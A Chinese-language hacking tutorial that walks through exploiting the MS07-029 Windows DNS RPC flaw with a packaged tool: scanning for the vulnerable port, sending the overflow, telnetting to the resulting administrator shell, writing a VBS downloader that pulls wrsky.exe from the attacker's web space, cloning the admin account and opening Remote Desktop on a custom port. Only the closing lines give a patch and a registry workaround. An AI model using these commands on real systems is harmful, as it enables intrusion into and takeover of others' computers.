关于漏洞的话题相信大家已经听说了很多，漏洞到底能给用户带来多大的危害呢？笔者将就MS07-029漏洞来带用户认识漏洞的危害！

　　我们先来看看所用工具的界面：

　　这就是传说中的利用工具，可以通杀2000SEVER，2003SEVER系统，并具备了扫描功能!

　　先用它来对主机进行扫描：

　　在我们的命令行下输入：“dns –s 目标IP地址”

　　此时开放的端口以及操作系统以出现在我们面前，如果出现了如上图所显示的“1029:Vulnerability”，那么我们离获取这台主机的权限已经很近了。

　　上图意思就是1029端口存在威胁（说白了就是漏洞）。

　　现在我们来近一步获取权限――溢出：

　　在命令行内输入

　　dns -2003chs *.*.93.189 1029

　　其中-2003ch的意思是操作系统的型号，-2003chs即简体中文版的2003系统，

　　如果是2000的系统就使用“-2000all”参数，*.*.93.189就是我们的目标IP地址，1029就是刚才扫描出存在漏洞的端口”。

　　出现“Attack sent ,check port 1100”字样，说明已经打开了目标地址的1100端口，我们TELNET上去：TELNET *.*.93.189 1100

　　我们现在已经成功的入侵了对方的电脑，并且得到了管理员的权限。

　　下面我给大家介绍一下如何在肉鸡上面开3389，

　　在命令行里输入

　　@echo with wscript:if .arguments.count^ zero.vbs

　　@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> zero.vbs

　　@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> zero.vbs

　　@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> zero.vbs

　　意思就是在命令行创立一个用来下载的VBS脚本zero.vbs

　　然后把开3389的工具上传到你的个人空间,

　　我这里用的是火狐开3389的工具，在命令行里输入 cscript zero.vbs http://你空间地址/wrsky.exe c:\wrsky.exe

　　“wrsky.exe -c”可以克隆当前管理员帐号

　　再输入“c:\wrsky.exe -o 3551”

　　意思就是打开对方的远程桌面服务，并且使用3551端口。

　　用“wrsky.exe -k”可以检查3389是否开启，开启以后输入“wrsky.exe -r”,对方的电脑就自动重启以后就可以连接上去了。

　　在运行里输入"mstsc",登陆上去。

　　那熟悉而又亲切的画面出现在我们面前了。

　　如果是2K的系统，还有一个更加傻瓜化的工具open3389，直接运行就可以了，不需要任何参数，不过对方电脑会马上重启。

　　显而易见这个漏洞的危害是十分巨大的，目前利用DNS服务RPC漏洞传播的蠕虫病毒已经已经开始疯狂传播。用户需要及时更新补丁，防止攻击者利用这些漏洞发动攻击，造成不必要的麻烦，或者打开记事本，输入：

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters]

　　"RpcProtocol"=dword:00000004

　　保存为扩展名为 .REG 的文件，双击导入，再重新启动 DNS 服务即可。